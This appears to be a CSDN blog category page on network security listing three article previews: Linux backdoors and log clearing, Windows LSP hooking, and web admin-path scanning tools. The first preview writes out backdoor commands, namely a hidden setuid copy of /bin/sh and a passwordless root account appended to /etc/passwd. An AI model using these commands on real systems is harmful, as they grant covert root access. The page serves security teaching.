![](https://img-blog.csdnimg.cn/20201014180756919.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
网络安全
Jeff_
面向Google和StackOverflow编程的小学生。
展开
-
linux 系统留后门方法和清除日志
1. setuid#cp /bin/sh /tmp/.sh#chmod u+s /tmp/.sh加上 suid 位到shell上,虽然很简单,但容易被发现2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd即给系统增加一个 id 为 0(root)的帐号,无口令。但管理员很快就可以发现哦!3.echo "++">...转载 2018-08-31 13:08:21 · 2458 阅读 · 0 评论 -
LSP和Hooks拦截
分层服务提供者(英语:Layered Service Provider,缩写LSP)是一项已被弃用的Microsoft Windows中Winsock 2服务提供者接口(SPI)的特性,它也被称为分层服务提供商或分层服务提供程序。分层服务提供者为使用Winsock API插入本身到TCP/IP协议栈的DLL。在进入协议栈后,分层服务提供者可以拦截和修改入站和出站的互联网流量。它可以处理所有访问...原创 2018-09-18 16:20:50 · 7274 阅读 · 0 评论 -
后台扫描的几种方法
1、字典扫描字典扫描是常用的一种Web目录扫描方法,类似于暴力破解,扫描结果是否理想取决于字典的大小,这类扫描软件较多,笔者只是列举几种典型和常见的扫描器,事实上,这几种已经足够应对日常的使用了。代表软件:破壳,wwwscan,御剑后台扫描,DirBuster破壳Web扫描器字典强大,扫描能力强,缺点是速度比较慢,当然可以自行调节并发线程数wwwscan网站文件目录批量...转载 2018-09-26 20:51:17 · 9501 阅读 · 0 评论